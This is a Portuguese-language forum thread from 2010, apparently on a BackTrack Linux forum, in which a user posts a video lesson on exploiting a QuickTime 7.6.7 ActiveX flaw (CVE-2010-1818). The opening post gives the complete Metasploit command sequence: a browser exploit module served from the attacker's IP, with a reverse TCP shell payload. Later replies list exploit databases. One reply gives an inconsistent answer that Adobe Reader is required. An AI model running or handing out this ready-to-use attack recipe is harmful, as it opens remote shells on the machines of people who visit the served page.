Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

**Bhior** · 09-17-2010, 03:02 AM

Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

Comandos:

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST SeuIP
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST SeuIP
set LPORT 5050
exploit

Sobre o Vídeo:
Formato: AVI
Tamanho: 8.2 MB
Duração: 3:57 min
Musica: Mantenha o Respeito - Marcelo D2

Baixar:

0day-quicktime.rar - 4shared.com - online file sharing and storage - download

On-line:

Metasploit - 0day - QuickTime 7.6.7 on Vimeo

Ref:
CVE - CVE-2010-1818 (under review)
67705: Apple Quicktime QTPlugin.ocx ActiveX IPersistPropertyBag2::Read Function _Marshaled_pUnk Memory Corruption
Reverse Mode - [0day] Apple QuickTime "_Marshaled_pUnk" backdoor param client-side arbitrary code execution

Fonte: Blog do Bhior: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

**Snayler** · 09-17-2010, 03:08 AM

Wow, não estava a par dessa... Vou já actualizar a minha cópia! Obrigado por partilhar, Bhior.

Já agora, onde posso ficar a par dos mais recentes exploits? Tem algum site específico?

EDIT: Após ver o vídeo fiquei com uma dúvida. Para este exploit funcionar, temos que ter o quicktime aberto, certo?

Abr

**espreto** · 09-17-2010, 11:00 AM

Já agora, onde posso ficar a par dos mais recentes exploits? Tem algum site específico?

Sério Snayler? Dúvido que você não saiba! Hehehe! Alias, meus parabéns por ser um dos membros mais ativos do fórum!

Mais vou responder alguns pra quem realmente não saiba!

OSVDB: The Open Source Vulnerability Database
SecurityFocus
.:[ packet storm ]:. - http://packetstormsecurity.org/
Exploits Database by Offensive Security

Dentre outros!!

Att,

**Snayler** · 09-17-2010, 03:01 PM

Originally Posted by espreto

Sério Snayler? Dúvido que você não saiba! Hehehe! Alias, meus parabéns por ser um dos membros mais ativos do fórum!

Lol! Por acaso não sabia, porque ainda não estou muito dentro do assunto no que toca a exploits. Mas uma simples procura no google dava-me uma resposta, é verdade. Apenas perguntei porque queria saber qual seria a melhor fonte

**Bhior** · 09-17-2010, 03:56 PM

Originally Posted by Snayler

Lol! Por acaso não sabia, porque ainda não estou muito dentro do assunto no que toca a exploits. Mas uma simples procura no google dava-me uma resposta, é verdade. Apenas perguntei porque queria saber qual seria a melhor fonte

Ola meu caro,

Você pode usar esse aqui também, ele reunir a maioria dos sites relacionados ao assunto.

jetlib.sec

Sim, precisa ter o Adobe reader instalado.

Abraços

BackTrack Linux - Penetration Testing Distribution

Thread: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Thread Tools

Search Thread

Display

[Video aula] Vulnerabilidade no QuickTime 7.6.7 (0day)

Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Similar Threads

[Video] Vulnerabilidade no Adober Reader - CVE-2010-0188

Wow! My DNS is POOR! Vulnerabilidade do DNS (CVE-2008-1447)

0day

HP NNM 0day

Quicktime exploit

Tags for this Thread

Posting Permissions